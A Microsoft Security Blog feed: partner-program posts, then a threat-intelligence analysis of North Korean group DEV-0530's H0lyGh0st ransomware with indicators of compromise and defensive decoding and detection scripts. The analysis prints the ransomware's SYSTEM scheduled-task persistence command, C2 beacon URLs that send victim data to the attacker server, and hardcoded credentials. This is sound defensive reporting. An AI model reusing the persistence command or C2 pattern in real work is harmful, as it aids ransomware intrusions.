Microsoft Purview APIs: We are constantly expanding our API surface area. With our investments in Microsoft Graph APIs, we are currently enabling extensibility scenarios across Purview Information Protection, Purview Data Lifecycle Management, Purview eDiscovery, Purview Audit, and more. Partners are using these APIs to build value-added services and solve unique customer scenarios.

Microsoft Purview Data Connectors: To enable high-fidelity data ingestion—including sources such as Slack, Zoom, and WhatsApp—we have partnered with Veritas, TeleMessage, 17a-4, and CellTrust to deliver more than 70 ready-to-use connectors. Our extensibility push provides more opportunities for partners to join this connector ecosystem.

Microsoft Purview Data Catalog: Microsoft Purview’s unified data governance capabilities help with managing on-premises, multicloud, and software as a service (SaaS) data. Microsoft Purview Data Catalog supports multicloud data classification and covers data repositories such as Azure Cosmos DB and Amazon Web Services (AWS) S3 buckets. There is also an Atlas Kafka API that facilitates extensibility scenarios for our partners and customers.

Microsoft Purview Compliance Manager: With universal templates, we help partners and customers extend compliance management capabilities to non-Microsoft environments.

Power Automate integrations: Microsoft Purview solutions including Microsoft Purview Data Lifecycle Management, Insider Risk Management, and Communication Compliance have built-in Power Automate integrations. This offers unique opportunities for our partners and customers to streamline and automate workflows and business scenarios.

Another way Microsoft supports the ecosystem is through the Microsoft Intelligent Security Association (MISA). MISA is an ecosystem of independent software vendors and managed service providers that have integrated their products and services with Microsoft’s security technology. Over the last year, MISA has extended its qualifying products to include a broad range of Microsoft Purview and Microsoft Priva products. MISA offers members co-marketing benefits and the opportunity to deepen their technology integrations and relationship within the Microsoft security ecosystem.

Partner with Microsoft Purview

Here are a few ways that partners can join the Microsoft Purview ecosystem:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How Microsoft Purview and Priva support the partner ecosystem appeared first on Microsoft Security Blog.

Congratulations to the Top MSRC 2022 Q2 Security Researchers!

July 19th, 2022

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers. The top three researchers of the 2022 Q2 Security Researcher Leaderboard are: Yuki Chen, Zhiyi Zhang, and William Söderberg! Check out the full list of researchers recognized …


How Microsoft Security partners are helping customers do more with less

July 19th, 2022

There has never been a greater demand for specialized cybersecurity expertise—or a greater opportunity for our partners to support our customers with new services and solutions. Over the last year, the permanent shift to hybrid work has empowered businesses to be remote and mobile. Increased adoption of public and private clouds has unlocked innovation, agility, and scale. At the same time, ransomware grew 105 percent over the past year and continues to become more sophisticated.1 The global cybersecurity talent shortage is now 2.72 million, and economic uncertainty has put the spotlight on extracting the highest possible return on investments.2

This week, as we join our partners at Microsoft Inspire, much of our conversation is focused on how, together, we can help our customers prioritize their security initiatives while getting the most out of the solutions they already have.

Security services are a critical need for the year ahead

Every year I am so energized by the expertise and creativity of our partners. Much of what we learn comes from them, so we commissioned a Total Economic Impact™ study from Forrester Consulting to better understand the high-level trends driving their security, compliance, and identity opportunities. It’s incredible to see that the Microsoft Security partner opportunity grew 21 percent year-over-year across the board in Microsoft 365 security, cloud security, compliance, and identity:

  • With the shift to hybrid work, workplace security has seen the most growth. It’s exciting to see that customers are taking advantage of the expanded security capabilities we’ve added to Microsoft 365, and enlisting partners to help them protect frontline workers, implement data discovery for Microsoft Teams, and activate more Microsoft 365 workloads securely. With many organizations struggling to staff their in-house security teams, partners are creating and delivering managed services built on top of Microsoft Sentinel for security information and event management (SIEM) and extended detection and response (XDR), as well as management, monitoring, and remediation across Microsoft 365.
  • There’s also an incredible demand for cloud security services—particularly multicloud. The rapid shift to cloud services has created an ever-evolving threat landscape, driving the need to better protect cloud resources, workloads, and applications. Without the expertise or resources to do that, customers are looking to partners to help with secure cloud migrations, managed services for the security operations center (SOC), and security management of all levels of cloud-based infrastructure.
  • Compliance-related managed services are the newest and fastest-growing area for most partners. More partners are starting to expand their general security services to include compliance, typically starting with information protection, communications governance, and insider risk, which are natural extensions of security practices. A trend we’re seeing is an increase in very large information protection deployment opportunities, as well as governance advisory services, which are central to the successful adoption of Microsoft compliance solutions.
  • As the foundation for all the previously mentioned points, our identity solutions are also fueling significant partner growth. Securing access for every identity—human and non-human—is critical in today’s connected world. Partners are capitalizing on these investments with repeatable identity-specific security solutions, off-the-shelf connectors, and managed services. Identity-first implementations of Zero Trust continue to be key areas of interest for security decision-makers, and partners serve a critical role in collaborating on plans, priorities, and architecture decisions.

Microsoft Security partners are expanding their existing offerings and creating new offerings in all these areas, packaging their unique experience, expertise, and IP for effective and efficient service delivery. Security deployment, advisory, solutions development, and managed services are needed now more than ever. In fact, within the USD247 billion cybersecurity market, security services spending is projected to reach USD77 billion by the end of 2022.3

Optimization through consolidation

Given the breadth of challenges our customers are facing, and recent economic headwinds, many organizations are looking to consolidate their security portfolios to optimize costs and reduce complexity. In fact, 78 percent of chief information security officers (CISOs) have 16 or more tools in their cybersecurity vendor portfolio, and according to Gartner®, “most organizations recognize vendor consolidation as an avenue for more efficient security, with 80 [percent] executing or interested in a strategy for this.”4

Microsoft integrates more than 50 different categories across security, compliance, identity, device management, and privacy—and most customers save 60 percent on average by leveraging Microsoft’s comprehensive security solutions compared to a multi-vendor strategy. All Microsoft Security product families work together as one comprehensive solution across clouds and across platforms, helping customers to reduce tool sprawl, maximize value out of what they already have, and reduce complexity. With recent announcements of Microsoft Entra and Microsoft Purview, we’ve also aligned our product portfolio with how our customers view the totality of their security challenges.

Radar chart listing six Microsoft product lines: Microsoft Defender, Microsoft Sentinel, Microsoft Entra, Microsoft Purview, Microsoft Priva, and Microsoft Endpoint Manager.

Consolidation isn’t just about tools—the lines between security workloads are blurring as well. Virtually every customer scenario includes elements of secure infrastructure, threat detection and response, identity management and secure access, compliance, and privacy—in fact, 90 percent of the Fortune 100 companies use four or more of these solutions. Our partners agree, and many are moving beyond their core specialty to provide a wider range of services to customers, creating new revenue streams and expanding their expertise as a result.

Maximizing the value of current investments

Assisting customers to deploy and fully leverage products they already own is one of the strongest ways our partners can deliver customer value. This week, Microsoft is announcing an entirely new partner investment to help partners drive customer success and product usage. Starting October 1, 2022, partners who help customers deploy their untapped security capabilities within Microsoft 365 E5 and Microsoft Azure will be eligible for up to USD25,000 per account. Microsoft is excited to provide this co-investment to ensure partners remain competitive in their offerings.

Once security products have been deployed, customers often need assistance analyzing and triaging security data to monitor their ecosystem. Microsoft is seeing a surge in organizations looking for a trusted managed detection and response (MDR) partner to help offload time-consuming work and augment their existing in-house security teams. Gartner estimates that 50 percent of organizations will be using MDR services by 2025, and with more than 785,000 customers currently using Microsoft’s advanced security products, the partner opportunity is tremendous. To meet this need, Microsoft has recently announced investments in our managed XDR partner community, including working with them to verify their XDR solutions for use with Microsoft products. Partners with a verified XDR service will have increased access to co-marketing funding to support their business and direct integration with Microsoft field sellers through co-sell opportunities. Partners can learn more about investing in managed XDR partner success.

At Microsoft, we are continually looking for ways to deliver more value with our solutions—and to make it easier for our partners to do the same. For example:

  • Most organizations don’t have IoT security at all, and those that do often need help integrating it into their broader SIEM and XDR programs. Microsoft Defender for IoT positions partners to solve both problems for customers. With new native integration with Microsoft 365 Defender that enables you to see vulnerable IoT devices in the Microsoft 365 Defender console and complete coverage across IoT, enterprise IoT, and operational technology (OT) devices, Defender for IoT can now secure all endpoint types, correlate incidents across the entire kill chain, and provide faster detection and response for attacks that previously may have been left undiscovered.
  • Despite facing similar risks as enterprises, small to medium-sized businesses (SMBs) often lack the same level of resources. Microsoft Defender for Business provides next-generation protection, endpoint detection and response (EDR), threat and vulnerability management, and automated investigation and remediation—all in a cost-effective package that’s easy to implement and use. Server support is now available in preview. Integration with Microsoft 365 Lighthouse and Remote Monitoring and Management (RMM) solutions enables Microsoft Cloud Solution Provider (CSP) partners to build on that value by delivering a fully managed service. Partners can learn more with the Microsoft Defender for Business partner kit.
  • Simplifying the cloud for the public sector and government entities empowers them to accelerate their digital transformation journey. Azure Confidential Computing now helps customers encrypt their data while it’s in use, so trusted partners can now migrate customer applications that handle sensitive data to Azure without rewriting them, and public sector customers can have confidence that their data is protected. And, to empower public sector customers to take advantage of the full power of the cloud while respecting their digital sovereignty, Microsoft Cloud for Sovereignty provides a means to build, move, and operate data and workloads in the cloud while meeting legal, security, and policy requirements.

Recognizing our partners of the year

Microsoft recently announced a simplified and more flexible way to be identified as a Microsoft Security Solution Provider. If you’ve historically been a silver or gold security partner or Enterprise Mobility Management partner, you now have the opportunity this coming year to be recognized through the Microsoft Cloud Partner Program (MCPP) as a security solution partner. 

Once identified, Microsoft offers a wide variety of co-marketing opportunities you can take advantage of in your own programs and in collaboration with Microsoft to differentiate your business, not the least of which is the opportunity to be recognized by Microsoft as the Security or Compliance partner of the year.

I’d like to congratulate Ernst and Young as the 2022 Security Partner of the Year in recognition of the use of the Zero Trust framework that fully leverages Microsoft Azure Active Directory (Azure AD) and Microsoft Azure Key Vault. I’d also like to recognize Edgile as the 2022 Compliance Partner of the Year for their integration of a comprehensive security framework that extends the capabilities of enterprises to also measure the maturity of their data governance. I want to congratulate these partners for their incredible work, as well as all the winners of the 2022 Microsoft Security Excellence Awards. I also want to express my gratitude to our entire partner community for all you do to advance our shared mission of security and to make the world a safer place.

Top takeaways for our partners

Microsoft partners have an amazing opportunity to showcase their security proficiency, drive new growth, and create real-world impact. We invite all our partners to download our commissioned Forrester report to spur ideas on how to differentiate and expand their business. I’ll close with a few ideas:

  • If you don’t have a security practice yet, now is the time! Explore a managed security services practice, such as managed XDR.
  • If you’re already offering your customers security services, you should consider going bigger! Lean into governance, risk management, and compliance and privacy with Microsoft Purview and Microsoft Priva.
  • Bolster security for small and medium-sized businesses with our Microsoft Defender for Business partner kit.

Be sure to check out our sessions at Microsoft Inspire that go deeper into these topics as well:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.


Mitigation for Azure Storage SDK Client-Side Encryption Padding Oracle Vulnerability

July 18th, 2022

Summary: Google informed Microsoft under Coordinated Vulnerability Disclosure (CVD) of a padding oracle vulnerability that may affect customers using Azure Storage SDK (for Python, .NET, Java) client-side encryption (CVE-2022-30187). To mitigate this vulnerability, we released a new General Availability (GA) version of the Azure Storage SDK client-side encryption feature (v2) on July 12, 2022. Microsoft …


North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware

A group of actors originating from North Korea that Microsoft Threat Intelligence Center (MSTIC) tracks as DEV-0530 has been developing and using ransomware in attacks since June 2021. This group, which calls itself H0lyGh0st, utilizes a ransomware payload with the same name for its campaigns and has successfully compromised small businesses in multiple countries as early as September 2021.

Along with their H0lyGh0st payload, DEV-0530 maintains an .onion site that the group uses to interact with their victims. The group’s standard methodology is to encrypt all files on the target device and use the file extension .h0lyenc, send the victim a sample of the files as proof, and then demand payment in Bitcoin in exchange for restoring access to the files. As part of their extortion tactics, they also threaten to publish victim data on social media or send the data to the victims’ customers if they refuse to pay. This blog is intended to capture part of MSTIC’s analysis of DEV-0530 tactics, present the protections Microsoft has implemented in our security products, and share insights on DEV-0530 and H0lyGh0st ransomware with the broader security community to protect mutual customers.

MSTIC assesses that DEV-0530 has connections with another North Korean-based group tracked as PLUTONIUM (aka DarkSeoul or Andariel). While the use of H0lyGh0st ransomware in campaigns is unique to DEV-0530, MSTIC has observed communications between the two groups, as well as DEV-0530 using tools created exclusively by PLUTONIUM.

As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach high confidence about the origin or identity of the actor behind the activity.

Who is DEV-0530?

DEV-0530 primarily operates ransomware campaigns to pursue financial objectives. In MSTIC’s investigations of their early campaigns, analysts observed that the group’s ransom note included a link to the .onion site hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd[.]onion, where the attackers claim to “close the gap between the rich and poor”. They also attempt to legitimize their actions by claiming to increase the victim’s security awareness by letting the victims know more about their security posture.

A screenshot of the ransom noted displayed by the H0lyGh0st ransomware. The page has a white background with black text, and presents information on how the ransomware victim can restore their files.
Figure 1. A H0lyGh0st ransom note linked to the attackers’ .onion site.
A screenshot of the H0lyGh0st .onion website. The page has a white background and white text, and presents claims made by the group regarding the motives behind their activities.
Figure 2. DEV-0530 attackers publishing their claims on their website.

Like many other ransomware actors, DEV-0530 notes on their website’s privacy policy that they would not sell or publish their victim’s data if they get paid. But if the victim fails to pay, they would publish everything. A contact form is also available for victims to get in touch with the attackers.

A screenshot from the H0lyGh0st website, presenting two sections in two columns. The column on the left detail their privacy and policy, while the one on the right pertains to their contact information.
Figure 3. Privacy policy and contact us information on the H0lyGh0st website.

Affiliations with other threat actors originating from North Korea

MSTIC assesses there is likely some overlap between DEV-0530 and PLUTONIUM. PLUTONIUM is a North Korean threat actor group affiliated with clusters of activity that are also known as DarkSeoul and Andariel. Active since at least 2014, PLUTONIUM has primarily targeted the energy and defense industries in India, South Korea, and the United States using a variety of tactics and techniques.

MSTIC has observed known DEV-0530 email accounts communicating with known PLUTONIUM attacker accounts. MSTIC has also observed both groups operating from the same infrastructure set, and even using custom malware controllers with similar names.

To further assess the origin of DEV-0530 operations, MSTIC performed a temporal analysis of observed activity from the group. MSTIC estimates that the pattern of life of DEV-0530 activity is most consistent with the UTC+8 and UTC+9 time zones. UTC+9 is the time zone used in North Korea.

Despite these similarities, differences in operational tempo, targeting, and tradecraft suggest DEV-0530 and PLUTONIUM are distinct groups.

Why are North Korean actors using ransomware?

Based on geopolitical observations by global experts on North Korean affairs and circumstantial observations, Microsoft analysts assess the use of ransomware by North Korea-based actors is likely motivated by two possible objectives.  

The first possibility is that the North Korean government sponsors this activity. The weakened North Korean economy has become weaker since 2016 due to sanctions, natural disasters, drought, and the North Korean government’s COVID-19 lockdown from the outside world since early 2020. To offset the losses from these economic setbacks, the North Korean government could have sponsored cyber actors stealing from banks and cryptocurrency wallets for more than five years. If the North Korean government is ordering these ransomware attacks, then the attacks would be yet another tactic the government has enabled to offset financial losses.

However, state-sponsored activity against cryptocurrency organizations has typically targeted a much broader set of victims than observed in DEV-0530 victimology. Because of this, it is equally possible that the North Korean government is not enabling or supporting these ransomware attacks. Individuals with ties to PLUTONIUM infrastructure and tools could be moonlighting for personal gain. This moonlighting theory might explain the often-random selection of victims targeted by DEV-0530.

Although Microsoft cannot be certain of DEV-0530’s motivations, the impact of these ransomware attacks on our customers raises the importance of exposing the underlying tactics and techniques, detecting and preventing attacks in our security products, and sharing our knowledge with the security ecosystem.

Ransomware developed by DEV-0530

Between June 2021 and May 2022, MSTIC classified H0lyGh0st ransomware under two new malware families: SiennaPurple and SiennaBlue. Both were developed and used by DEV-0530 in campaigns. MSTIC identified four variants under these families – BTLC_C.exe, HolyRS.exe, HolyLock.exe, and BTLC.exe – and clustered them based on code similarity, C2 infrastructure including C2 URL patterns, and ransom note text. BTLC_C.exe is written in C++ and is classified as SiennaPurple, while the rest are written in Go, and all variants are compiled into .exe to target Windows systems. Microsoft Defender Antivirus, which is built into and ships with Windows 10 and 11, detects and blocks BTLC_C.exe as SiennaPurple and the rest as SiennaBlue, providing protection for Windows users against all known variants of the H0lyGh0st malware.

A timeline of the payloads used by DEV-0530 over time, SiennaPurple and SiennaBlue. The timeline covers developments from May 2021 to June 2022, with SiennaPurple being used from May to October 2021, and SiennaBlue from September 2021 to June 2022 and beyond.
Figure 4. Timeline of DEV-0530 ransomware payloads.

SiennaPurple ransomware family: BTLC_C.exe

BTLC_C.exe is a portable ransomware developed by DEV-0530 and was first seen in June 2021. This ransomware has far fewer features than the malware variants in the SiennaBlue family. Most prominently, if not launched as an administrative user, the BTLC_C.exe malware displays the following hardcoded error before exiting:

"This program only execute under admin privilege".

The malware uses a simple obfuscation method for strings where 0x30 is subtracted from the hex value of each character, such that the string “aic^ef^bi^abc0” is decoded to 193[.]56[.]29[.]123. The indicators of compromise (IOCs) decoded from the BTLC_C.exe ransomware are consistent with all malware variants in the SiennaBlue family, including the C2 infrastructure and the HTTP beacon URL structure access.php?order=AccessRequest&cmn. The BTLC_C.exe sample analyzed by MSTIC has the following PDB path: M:\ForOP\attack(utils)\attack tools\Backdoor\powershell\btlc_C\Release\btlc_C.pdb.
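As an added example (not code from the Microsoft post), the Python below implements the 0x30-subtraction scheme just described so an analyst can recover the strings from a sample. The obfuscated string “aic^ef^bi^abc0” is the one quoted above; the encoder, the buffer scanner and its sample bytes are constructed here for illustration and are not part of the original analysis.

```python
# Added example, not from the Microsoft blog post: decode strings protected by
# the SiennaPurple scheme, in which each stored byte is the plaintext byte plus
# 0x30. The trailing "0" of "aic^ef^bi^abc0" therefore decodes to 0x00, the
# C-string terminator, which is why the decoded result is "193.56.29.123".

ENCODING_OFFSET = 0x30


def decode_sienna_string(obfuscated: str) -> str:
    """Subtract 0x30 from every character and stop at the first NUL."""
    out = []
    for ch in obfuscated:
        value = ord(ch) - ENCODING_OFFSET
        if value < 0:
            raise ValueError(f"{ch!r} is below 0x30 and cannot be an encoded byte")
        if value == 0:  # 0x30 - 0x30 == 0x00: end of the C string
            break
        out.append(chr(value))
    return "".join(out)


def encode_sienna_string(plain: str) -> str:
    """Inverse transform (constructed here only to round-trip the decoder);
    letters map to bytes >= 0x80, so the result is handled as Latin-1."""
    return "".join(chr(ord(ch) + ENCODING_OFFSET) for ch in plain) + "0"


def defang(indicator: str) -> str:
    """Write dots as '[.]' so a recovered address is not clickable in reports."""
    return indicator.replace(".", "[.]")


def extract_candidate_strings(blob: bytes, min_len: int = 8) -> list:
    """Constructed triage helper: scan a buffer for byte runs the scheme could
    have produced (every byte above 0x30, terminated by a literal '0') and
    return them decoded. Expect false positives on text that ends in '0'."""
    results = []
    run = bytearray()
    for b in blob:
        if b == ENCODING_OFFSET:  # a literal '0' terminates an encoded string
            if len(run) >= min_len:
                results.append(decode_sienna_string(run.decode("latin-1")))
            run = bytearray()
        elif b > ENCODING_OFFSET:
            run.append(b)
        else:  # bytes below 0x30 cannot come from the scheme; restart the run
            run = bytearray()
    return results


# Constructed buffer: two encoded strings separated by NUL padding. The second
# is the beacon path quoted in the post, encoded here with the inverse transform.
SAMPLE_BLOB = (
    b"\x00\x00aic^ef^bi^abc0\x00\x00"
    + encode_sienna_string("access.php?order=AccessRequest&cmn").encode("latin-1")
    + b"\x00"
)

if __name__ == "__main__":
    for s in extract_candidate_strings(SAMPLE_BLOB):
        print(defang(s))
```

Run against a real sample's .data or .rdata section, the scanner will also surface plain text that happens to end in a digit zero, so treat its output as candidates to confirm by hand rather than as IOCs.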

SiennaBlue ransomware family: HolyRS.exe, HolyLocker.exe, and BTLC.exe

Between October 2021 and May 2022, MSTIC observed a cluster of new DEV-0530 ransomware variants written in Go. We classified these variants as SiennaBlue. While new Go functions were added to the different variants over time, all the ransomware in the SiennaBlue family share the same core Go functions.

A deeper look into the Go functions used in the SiennaBlue ransomware showed that over time, the core functionality expanded to include features like various encryption options, string obfuscation, public key management, and support for the internet and intranet. The table below demonstrates this expansion by comparing the Go functions in HolyRS.exe and BTLC.exe:

HolyRS.exe [2021]            BTLC.exe [2022]
main_DisableNetworkDevice    main_encryptString

MSTIC assesses DEV-0530 successfully compromised several targets in multiple countries using HolyRS.exe in November 2021. A review of the victims showed they were primarily small-to-midsized businesses, including manufacturing organizations, banks, schools, and event and meeting planning companies. The victimology indicates that these victims are most likely targets of opportunity. MSTIC suspects that DEV-0530 might have exploited vulnerabilities such as CVE-2022-26352 (DotCMS remote code execution vulnerability) on public-facing web applications and content management systems to gain initial access into target networks. The SiennaBlue malware variants were then dropped and executed. To date, MSTIC has not observed DEV-0530 using any 0-day exploits in their attacks.

After successfully compromising a network, DEV-0530 exfiltrated a full copy of the victims’ files. Next, the attackers encrypted the contents of the victim device, replacing all file names with Base64-encoded versions of the file names and renaming the extension to .h0lyenc. Victims found a ransom note in C:\FOR_DECRYPT.html, as well as an email from the attackers with subject lines such as:

!!!!We are < H0lyGh0st>. Please Read me!!!!

As seen in the screenshot below, the email from the attackers let the victim know that the group has stolen and encrypted all their files. The email also included a link to a sample of the stolen data to prove their claim, in addition to the demand for payment for recovering the files.

A screenshot of the email sent by DEV-0530 as a ransom note to their targets. The email message tells the target to pay in order to recover their files. It also mentions a URL where they can access some of their data.
Figure 5. Ransom note left by DEV-0530 attackers.

BTLC.exe is the latest DEV-0530 ransomware variant and has been seen in the wild since April 2022. BTLC.exe can be configured to connect to a network share using the default username, password, and intranet URL hardcoded in the malware if the ServerBaseURL is not accessible from the device. One notable feature added to BTLC.exe is a persistence mechanism in which the malware creates or deletes a scheduled task called lockertask, such that the following command line syntax can be used to launch the ransomware:

cmd.exe /Q /c schtasks /create /tn lockertask /tr [File] /sc minute /mo 1 /F /ru system 1> \\\ADMIN$\__[randomnumber] 2>&1

Once the ransomware is successfully launched as an administrator, it tries to connect to the default ServerBaseURL hardcoded in the malware, attempts to upload a public key to the C2 server, and encrypts all files in the victim’s drive.
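The two behaviours described above, the Base64-renamed files carrying the .h0lyenc extension and the lockertask scheduled task, can be checked for in endpoint telemetry. The Python below is an added example, not code or a hunting query from the Microsoft post: the event records, host names and field names are constructed and assumed, and only the command-line shape, the task name, the extension and the ransom-note path come from the post.

```python
import base64
import binascii
import shlex

ENCRYPTED_EXT = ".h0lyenc"             # extension described in the post
RANSOM_NOTE = "c:\\for_decrypt.html"   # ransom note location from the post
IOC_TASK_NAME = "lockertask"           # scheduled task name from the post


def parse_schtasks_create(cmdline: str) -> dict:
    """Return the options of a 'schtasks /create' command as a dict
    ({'tn': 'lockertask', 'f': True, ...}); empty dict if it is not one.
    Handles the post's pattern where schtasks is wrapped in cmd.exe /c."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:
        return {}
    lowered = [t.lower() for t in tokens]
    starts = [i for i, t in enumerate(lowered) if t in ("schtasks", "schtasks.exe")]
    if not starts or "/create" not in lowered[starts[0]:]:
        return {}
    opts = {}
    i = lowered.index("/create", starts[0]) + 1
    while i < len(tokens):
        if tokens[i].startswith("/"):
            key = lowered[i][1:]
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
            opts[key] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1  # redirections such as 1> ... 2>&1 are not options
    return opts


def scheduled_task_findings(cmdline: str) -> list:
    """Reasons a task-creation command line resembles the BTLC.exe persistence."""
    opts = parse_schtasks_create(cmdline)
    if not opts:
        return []
    reasons = []
    if str(opts.get("tn", "")).lower() == IOC_TASK_NAME:
        reasons.append("task name lockertask (DEV-0530 indicator)")
    if str(opts.get("sc", "")).lower() == "minute" and str(opts.get("mo", "")) == "1":
        reasons.append("fires every minute")
    if str(opts.get("ru", "")).lower() in ("system", "nt authority\\system"):
        reasons.append("runs as SYSTEM")
    return reasons


def decode_h0lyenc_name(path: str):
    """If the file name is a Base64 stem plus .h0lyenc, as the post describes,
    return the decoded original name; otherwise None."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    if not name.lower().endswith(ENCRYPTED_EXT):
        return None
    stem = name[: -len(ENCRYPTED_EXT)]
    if not stem:
        return None
    try:
        return base64.b64decode(stem, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def triage(events: list) -> list:
    """Run both checks plus the ransom-note path over a list of event dicts and
    return (host, finding) tuples. Field names are assumed for this example."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            reasons = scheduled_task_findings(ev["cmdline"])
            if reasons:
                findings.append((ev["host"], "scheduled task: " + "; ".join(reasons)))
        elif ev["type"] == "file":
            original = decode_h0lyenc_name(ev["path"])
            if original is not None:
                findings.append((ev["host"], f"encrypted file {ev['path']} (original name {original})"))
            if ev["path"].lower() == RANSOM_NOTE:
                findings.append((ev["host"], f"ransom note written to {ev['path']}"))
    return findings


# Constructed sample telemetry (not real logs): one host shows all three
# behaviours, the others show benign activity.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01",
     "cmdline": "cmd.exe /Q /c schtasks /create /tn lockertask /tr C:\\Users\\Public\\BTLC.exe "
                "/sc minute /mo 1 /F /ru system 1> \\\\ws01\\ADMIN$\\__1657 2>&1"},
    {"type": "process", "host": "ws02",
     "cmdline": "schtasks /create /tn NightlyBackup /tr C:\\Tools\\backup.exe /sc daily /st 02:00"},
    {"type": "file", "host": "ws01",
     "path": "C:\\Users\\alice\\Documents\\UXVhcnRlcmx5LXJlcG9ydC5kb2N4.h0lyenc"},
    {"type": "file", "host": "ws01", "path": "C:\\FOR_DECRYPT.html"},
    {"type": "file", "host": "ws03", "path": "C:\\Users\\bob\\notes.txt"},
]

if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS):
        print(host, finding)
```

The task-name match is the narrow indicator; the every-minute schedule running as SYSTEM is the broader behavioural signal and will also catch legitimate but unusual administrative tasks, so it is better suited to a hunting query than to an automatic block.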

HolyRS.exe/HolyLocker.exe C2 configuration:

  • main_ServerBaseURL: hxxp://193[.]56[.]29[.]123:8888
  • main_IntranetURL: 10[.]10[.]3[.]42
  • main_Username: adm-karsair

BTLC.exe C2 configuration:

  • EncryptionKey: H0lyGh0stKey1234
  • IntranetUrl: 192[.]168[.]168[.]5
  • Username: atrismsp
  • Scheduledtask name: lockertask

A screenshot of assembly code presenting configuration information used by the malware to connect to its C2 server. The code includes the C2 URL, as well as the attacker's username.
Figure 6. BTLC.exe C2 communication

Based on our investigation, the attackers frequently asked victims for anywhere from 1.2 to 5 Bitcoins. However, the attackers were usually willing to negotiate and, in some cases, lowered the price to less than one-third of the initial asking price. As of early July 2022, a review of the attackers’ wallet transactions shows that they have not successfully extorted ransom payments from their victims.

A screenshot from a Bitcoin explorer page presenting information on the attackers' Bitcoin wallet. The page shows that the Bitcoin wallet is empty.
Figure 7. Screenshot of DEV-0530 attackers’ wallet

HolyRS.exe/BTLC.exe C2 URL pattern:

  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=GetPubkey&cmn=[Victim_HostName]
  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=golc_key_add&cmn=[Victim_HostName]&type=1
  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=golc_key_add&cmn=[Victim_HostName]&type=2
  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=golc_finish&cmn=[Victim_HostName]&

Examples of HolyRS.exe/BTLC.exe ransom note metadata:

Attacker email address: H0lyGh0st@mail2tor[.]com
Image location: hxxps://cloud-ex42[.]usaupload[.]com/cache/plugins/filepreviewer/219002/f44c6929994386ac2ae18b93f8270ec9ff8420d528c9e35a878efaa2d38fb94c/1100x800_cropped.jpg
Report URL: hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd[.]onion

Microsoft will continue to monitor DEV-0530 activity and implement protections for our customers. The current detections, advanced detections, and indicators of compromise (IOCs) in place across our security products are detailed below.

Recommended customer actions

Microsoft has implemented protections to detect these malware families as SiennaPurple and SiennaBlue (e.g., ALF:Ransom:Win32/SiennaBlue.A) via Microsoft Defender Antivirus and Microsoft Defender for Endpoint, wherever these are deployed on-premises and in cloud environments.

Microsoft encourages all organizations to proactively implement and frequently validate a data backup and restore plan as part of broader protection against ransomware and extortion threats.

The techniques used by DEV-0530 in H0lyGh0st activity can be mitigated by adopting the security considerations provided below:

  • Use the included IOCs to investigate whether they exist in your environment and assess for potential intrusion.

Our blog on the ransomware-as-a-service economy has an exhaustive guide on how to protect against ransomware threats. We encourage readers to refer to that blog for a comprehensive guide with a deep dive into each of the following areas:

For small or midsize companies that use Microsoft Defender for Business or Microsoft 365 Business Premium, enabling each of the features below provides a protective layer against these threats where applicable. For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.
  • Use device discovery to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.
  • Protect user identities and credentials using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.

Indicators of compromise

This list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator | Type | Description
99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd | SHA-256 | Hash of BTLC_C.exe
f8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86 | SHA-256 | Hash of HolyRS.exe
bea866b327a2dc2aa104b7ad7307008919c06620771ec3715a059e675d9f40af | SHA-256 | Hash of BTLC.exe
cmd.exe /Q /c schtasks /create /tn lockertask /tr [File] /sc minute /mo 1 /F /ru system 1> \\\ADMIN$\__[randomnumber] 2>&1 | Command line | Example of the scheduled task created by BTLC.exe
193[.]56[.]29[.]123 | C2 | C2 IP address
H0lyGh0st@mail2tor[.]com | Email | Ransomware payment communication address
C:\FOR_DECRYPT.html | File path | File path of ransom note

NOTE: These indicators should not be considered exhaustive for this observed activity.

